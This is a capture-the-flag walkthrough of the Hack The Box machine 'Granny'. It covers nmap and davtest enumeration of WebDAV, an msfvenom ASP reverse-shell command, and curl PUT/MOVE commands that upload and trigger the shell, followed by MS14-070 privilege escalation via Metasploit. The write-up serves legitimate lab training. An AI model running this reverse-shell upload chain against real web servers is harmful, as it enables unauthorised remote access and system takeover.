Let’s get started!
COMMAND: nmap -sC -sV -oN granny 10.10.10.15
Let’s open the url in the webpage and check !
After visiting the url we can see clearly that the site is under construction and may be some misconfigurations might be revealed and we can take advantage for further exploitation.
By checking the website directories with the use of dirb too, we could clearly know that there are some server misconfiguration . However, the port scan revealed that http webdav methods can used. A good way to test for this is with
COMMAND: davtest –url http://10.10.10.15
After looking around online i found a good sources online to use curl for method requests:
Webdav curl examples link
Firstly a shell needs to be generated to upload to the web server. Since the server is running asp as found in enumeration, an asp shell can be generated through msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS LPORT=PORT -f asp > exp1o1t9r.asp
Curl is used for sending the reverse shell as a .txt file. Then the MOVE method is used to change the file extension to
root@exp1o1t9r:~/htb/machines/granny# curl -T 'exp1o1t9r.txt' http://10.10.10.15/exp1o1t9r.txt root@exp1o1t9r:~/htb/machines/granny# curl -X MOVE --header 'Destination:http://10.10.10.15/exp1o1t9r.asp' 'http://10.10.10.15/exp1o1t9r.txt' root@exp1o1t9r:~/htb/machines/granny# curl 'http://10.10.10.15/exp1o1t9r.asp'
After sending payload to the server we need to setup a listener inorder to get a reverse shell!
BOOM! we got shell. let’s pwn the user flag!!
ACCESS DENIED !!:(
whoami /all reveals that i do not have a privileged shell, this will require further post enumeration to get a privileged shell.
sysinfo shows that the machine is an old version of windows running
Windows server 2003 SP2.
After some research, several local exploits have been found at:
The MS14-070 exploit appeared to be what i was looking for. The exploit was put onto the target machine the same way as the reverse shell. When executing the exploit there was a problem with the exploit not working properly. The process was running but it was stuck.
To solve this, metasploit is used to convert the shell to meterpreter and migrate the process.
use the exploit to bypass privileges!!
If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r